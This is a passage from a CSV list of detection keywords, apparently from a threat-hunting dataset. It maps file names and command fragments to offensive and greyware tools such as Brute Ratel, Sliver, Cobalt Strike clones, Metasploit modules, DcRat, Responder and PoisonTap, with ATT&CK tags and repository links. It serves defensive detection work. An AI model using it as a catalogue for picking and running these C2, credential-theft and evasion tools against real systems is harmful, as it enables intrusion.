T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*pivot_winrm *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*pivotnacci http*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivotnacci -*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivotnacci *--polling-interval*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivotnacci/0.0.1*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivotnacci-master*","offensive_tool_keyword","pivotnacci","A tool to make 
socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*pivots/named-pipe_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*-pk8gege.org*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/AlphabugX/csOnvps","1","0","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*pkexec64.tar.gz*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*pkt_comm/word_gen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pkt_comm/word_list*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pktmon start*","greyware_tool_keyword","pktmon","pktmon network diagnostics tool for Windows that can be used for packet capture - packet drop detection - packet filtering and counting.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://learn.microsoft.com/en-us/windows-server/networking/technologies/pktmon/pktmon","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*plex_unpickle_dict_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*plpmggfglncceinmilojdkiijhmajkjh*","greyware_tool_keyword","Red Panda VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*plug_getpass_nps.dll*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*plug_katz_nps.exe*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*plug_qvte_nps.exe*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" +"*plugins.nessus.org.*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" +"*Plugins\AccessTokens\TokenDriver*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Plugins\AccessTokens\TokenManipulation*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Plugins\Execution\PSExec*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*Plugins\SendFile.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Plugins\SendMemory.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*plummm/CVE-2022-27666*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" +"*pm3 -p /dev/ttyACM0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*poc.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" 
+"*poc.exe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.exe*poc.txt*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*poc.msi*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.pl*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.ps1*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.reg*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.run*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.sh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.vb*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.vbe*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*poc.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" +"*POC_CloudFilter_ArbitraryFile_EoP*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*POC_CloudFilter_ArbitraryFile_EoP.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*POC_DLL.dll*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z"
+"*POC1*implant.cpp*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z"
+"*POC2*implant.cpp*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z"
+"*pocs_go/*/CVE-*.go*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - 
T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*podalirius@protonmail.com*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"*podman run * --name avred -d avred*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z"
+"*poeojclicodamonabcabmapamjkkmnnk*","greyware_tool_keyword","HMA VPN Proxy Unblocker","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*poetry run bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*poetry run NetExec *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate 
assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*poison_ivy_c2*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Poisoners-Session.log*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*poisonivy_bof.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*poisontap*","offensive_tool_keyword","poisontap","PoisonTap - siphons cookies. exposes internal router & installs web backdoor on locked computers","T1534.002 - T1059.001 - T1053.005 - T1564.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/samyk/poisontap","1","0","N/A","N/A","10","6027","1027","2018-11-26T16:50:44Z","2016-11-16T11:51:34Z"
+"*polenum *-protocols *","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*polenum -h*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
+"*pony-02.aftxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*pooljnboifbodgifngpppfklhifechoe*","greyware_tool_keyword","GeoProxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
